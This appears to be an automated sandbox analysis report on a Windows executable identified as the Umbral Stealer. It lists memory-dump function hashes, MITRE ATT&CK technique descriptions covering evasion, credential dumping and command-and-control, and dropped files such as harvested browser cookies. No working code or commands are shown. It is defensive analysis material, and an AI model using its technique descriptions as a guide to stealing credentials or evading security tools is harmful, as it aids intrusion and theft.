Instruction ID: d59e1b136dd4c051d4b216d8bdd8f9322b4ab1233b7a1200e3e607df0e5e1a12
Opcode Fuzzy Hash: 5d139b3cd76ba32190acd627f2a41198fe28117c52bc90b7514809e45e7fcfe3
Instruction Fuzzy Hash: 88E08C31608A044B4748EA2C808C92BBFE1DBEC365F140B3FB40CD3270DA7086408789

Function 00007FF887D258F0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31086f589de209730a3dff685da2d1af417bb63f85e4c5abfe11370534b9266c
Instruction ID: cecb4f65f29d67d2b903f7d0bb9d3a2b8a39ff72efbb7acdbf7fba8726fc68ee
Opcode Fuzzy Hash: 31086f589de209730a3dff685da2d1af417bb63f85e4c5abfe11370534b9266c
Instruction Fuzzy Hash: 94D01220978F2D4BDAB4FB7890457E961F0FB58310F400A7AD02BC3589DF6CA9858781

Function 00007FF887D16C10 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef63385cac71275afcbe8feea758febdb6545e63e03d4449a82a5762cf0bfdea
Instruction ID: 76b6c8444a44fddf02d53a1901d299aa22f8ad23254c13785c87dc47a5df031a
Opcode Fuzzy Hash: ef63385cac71275afcbe8feea758febdb6545e63e03d4449a82a5762cf0bfdea
Instruction Fuzzy Hash: 85D05E45E64E4957E74CAB3E098A1783BD2FB98515FC882B4DC0AC729AEC2864928749

Function 00007FF887D0289A Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1d7a66a4f68ad7b2851c39847af31baac190ab8d6e07bc7a3ee5de3354a9668
Instruction ID: de17f633cf65198c648b2829757b478c93e1ada6bacaaa609d4cb7c5d8b0788a
Opcode Fuzzy Hash: a1d7a66a4f68ad7b2851c39847af31baac190ab8d6e07bc7a3ee5de3354a9668
Instruction Fuzzy Hash: 02D02B22C8EF469BE756C334B8411ECB7A0FF20350F0002BDC0198724BDE251086C741

Function 00007FF887D0179A Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c9ad7440dfc1e784ceb1e9aecde5fabbde23ee0c556e9cb9a3d76547d1f6a1d
Instruction ID: b5b2febd701712c4009161fa7c95efb0ebbc5fe5672d2410dac09e9afe783a2a
Opcode Fuzzy Hash: 6c9ad7440dfc1e784ceb1e9aecde5fabbde23ee0c556e9cb9a3d76547d1f6a1d
Instruction Fuzzy Hash: 0DD0C262C4DA86ABE7658674A4425ACBBF0BF40290F10127AC0995218BDE1A14C6C641

Function 00007FF887D0789A Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f45d86db6a5005ad0f3551b55d50ed0c7c9475491bc0564f15b82cc79ff21487
Instruction ID: 515d8f4cc7d51cacbecc565f925586e1a784482a3e571586cc1159e8f8ebc37f
Opcode Fuzzy Hash: f45d86db6a5005ad0f3551b55d50ed0c7c9475491bc0564f15b82cc79ff21487
Instruction Fuzzy Hash: 4CD02E22C89E0867EB38E2B074411AC73B0FB90320F04022AD00A4A28FCE2A0086C2A1

Function 00007FF887D0BFFF Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8378250f5738df531124e19c474ca1f9e00d81bc4e25dafd8b635f3a0eaf2c23
Instruction ID: fc7cb3562fe46dd14833db8f67fe8a7ffa540690687ffc7ade3dd1536ee8f14b
Opcode Fuzzy Hash: 8378250f5738df531124e19c474ca1f9e00d81bc4e25dafd8b635f3a0eaf2c23
Instruction Fuzzy Hash: F6D0A722D8C94787D3594B38A4120EDB3F0FF51290B400235D84E9318FEE291487C680

Function 00007FF887CFDF4F Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 661dde2b019153591f70761eaf737d5f3fabcd52558f3654aa184447f505a67a
Instruction ID: 33239046657a513d786b7af445eb553530636206e5ead0c63ba62265733dfe93
Opcode Fuzzy Hash: 661dde2b019153591f70761eaf737d5f3fabcd52558f3654aa184447f505a67a
Instruction Fuzzy Hash: D6D0A935C4CC0BA7E7A84B24E8010ECB3B2FF50350F902634E028832CFDE29A847CA90

Function 00007FF887D0DD2A Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ba3b265b272cafe19e6b945b004400daabb86574df7b723d232971d44f4503d
Instruction ID: 786d0e52bc976819fdb8853497af48e8235d69fdec100fee523168c1b2f24436
Opcode Fuzzy Hash: 5ba3b265b272cafe19e6b945b004400daabb86574df7b723d232971d44f4503d
Instruction Fuzzy Hash: BDD02213C8CE0A02E76AA024F8415EC2790F7506A0F541239C02A4228AED09148ACA90

Function 00007FF887D04484 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61c122647bebdbd197b5060b894789d068b8e8f0ddb567ec71b86157b83aceeb
Instruction ID: 61618e86337171480a9797e7ad6b966217cac4d30a93aa097467c2862a29041b
Opcode Fuzzy Hash: 61c122647bebdbd197b5060b894789d068b8e8f0ddb567ec71b86157b83aceeb
Instruction Fuzzy Hash: C8C09B06B6C92906E760555CBC511BD93D2EBC55707741777D40EC22CECC5DD88141C5

Function 00007FF887D04474 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cd78781cb8dac312dc2232a0f9bad8ac94d21508b3ccaa01cc17be0a35575da
Instruction ID: 35712e5695ea0154e09ad85352ce32e4553d513272844fdbc3679c0a4e3307e5
Opcode Fuzzy Hash: 6cd78781cb8dac312dc2232a0f9bad8ac94d21508b3ccaa01cc17be0a35575da
Instruction Fuzzy Hash: 7CC09B06B6C92906E760555CBC511BD93D2FFC55707641777D40EC238ECC5DD84141C5

Function 00007FF887CF3F43 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b98fb3ca0422ec182acada8020c46d2f7432b3deb85cef3b81dc2009e266591c
Instruction ID: 5d92eca8af36bbc92c6e2fb26cde40fe3c75e17c2bcb891dc707ba9e5de550f4
Opcode Fuzzy Hash: b98fb3ca0422ec182acada8020c46d2f7432b3deb85cef3b81dc2009e266591c
Instruction Fuzzy Hash: 33C0123246C54657D341B700F4518EF7361BF90610F801B39F04A86095DE6C66448582

Function 00007FF887D04540 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 573247d44637427b6805416967b923f788a1a978ac401ee465e14a738c4cef4d
Instruction ID: 56c05b4f55d6d1e6d7f6ca0605281e2059b8437bae71133a806afdc952c641de
Opcode Fuzzy Hash: 573247d44637427b6805416967b923f788a1a978ac401ee465e14a738c4cef4d
Instruction Fuzzy Hash: 9EC09221A29C2C1A07ACA22D1849A7A14E7DBDE62171942ABA40CD3299DC948C0683D5

Function 00007FF887CFE443 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f026838f21e46fa06dbbc66431e40ba0d25a87d3eb651443a139cabe19dd871
Instruction ID: 382b9205199f8b081452ac412e63ca8f2677978a06c0dc317cceed51c796dbbe
Opcode Fuzzy Hash: 9f026838f21e46fa06dbbc66431e40ba0d25a87d3eb651443a139cabe19dd871
Instruction Fuzzy Hash: 01C0123246C60947D341E750E4518EEB361BF90650F801B39F04A86095DD58A6458682

Function 00007FF887D0E068 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d530e1657669fa38461b0c6727a3735be063458917c8bd6de20b377420e1b726
Instruction ID: 2a2e5c14989636fa6130bf6ca3e7d406efc6773d9ada92e276b0a63a9708b844
Opcode Fuzzy Hash: d530e1657669fa38461b0c6727a3735be063458917c8bd6de20b377420e1b726
Instruction Fuzzy Hash: 3FC08C20824A0D8AC614B728844525C71A0FF08340FC00AA4E04CC2288E62CD0508306

Function 00007FF887D02B60 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f697712c7cf326c03d853dc8710229d1c640a16f7f7502dee055214bf95ae15
Instruction ID: 88f5ecd7fedd894015c67b914733355834b0845fc1b00cf12b5b504628054dcb
Opcode Fuzzy Hash: 1f697712c7cf326c03d853dc8710229d1c640a16f7f7502dee055214bf95ae15
Instruction Fuzzy Hash: 3CB09223A8A40AC5AA105589B4020FDF320FB802B6F103233E20E92089C90660268181

Function 00007FF887D0B635 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15faabeb865673dcff9243e3daa9b92b9217bc6b420e55384cc35e80e64abbe3
Instruction ID: d3739258ee35ab0bba90836ee2037331aff74937c86e41e89b03dbd24408a1af
Opcode Fuzzy Hash: 15faabeb865673dcff9243e3daa9b92b9217bc6b420e55384cc35e80e64abbe3
Instruction Fuzzy Hash: 28B01233A89009465A200084B8010FDF720E78017AF211233C70E81004C942102685C0

Function 00007FF887CFDB88 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f72e705ceeebae5a762c08f55ec03f64d30bb5de0830dddeac537378711013f
Instruction ID: 734b3bd536176f2f5c5a13e7fc4bcc8c0eac6f11e7d7f07df0b4f3d9b3389f8c
Opcode Fuzzy Hash: 0f72e705ceeebae5a762c08f55ec03f64d30bb5de0830dddeac537378711013f
Instruction Fuzzy Hash: 09B0123040C3430BC242116454901D477312F023D47094172CE6C040C38A0C28888AC6

Function 00007FF887CFFFB8 Relevance: .0, Instructions: 1COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd9aa500e7ed1edc6593eac41fca1dcfc302f226db9aff41ee02793617992f8d
Instruction ID: 32ed6c366dfcbab1a5498753b1ce1d4692d848f3521cd0a9850421119152e6a4
Opcode Fuzzy Hash: fd9aa500e7ed1edc6593eac41fca1dcfc302f226db9aff41ee02793617992f8d
Instruction Fuzzy Hash:

Function 00007FF887CFFFA8 Relevance: .0, Instructions: 1COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2d2cb041ca94ecdbb73872818d9cf22db8197b4a65bad6bdf314becc185e7f9
Instruction ID: 1f04b19109ae500aceadebc7cd37d84ef2109975b702e1ce856de5e0569557c5
Opcode Fuzzy Hash: a2d2cb041ca94ecdbb73872818d9cf22db8197b4a65bad6bdf314becc185e7f9
Instruction Fuzzy Hash:

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report WE8zqotCFj.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Umbral Stealer

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WE8zqotCFj.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Fke9TkbC12tBAtr.ligma

C:\Users\user\AppData\Local\Temp\Fke9TkbC12tBAtr\Browsers\Cookies\Chrome Cookies.txt

C:\Users\user\AppData\Local\Temp\Fke9TkbC12tBAtr\Display\Display.png

C:\Users\user\AppData\Local\Temp\GuYq5GX1e2Hv4DX

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_10ylwvwq.2as.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5oovw3bv.0qo.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f5j0q3cb.e3y.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fff5wlyn.bpz.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_haoxmy0g.p43.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mj51vj0f.onc.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qopysqok.g0a.ps1

Windows Analysis Report
WE8zqotCFj.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre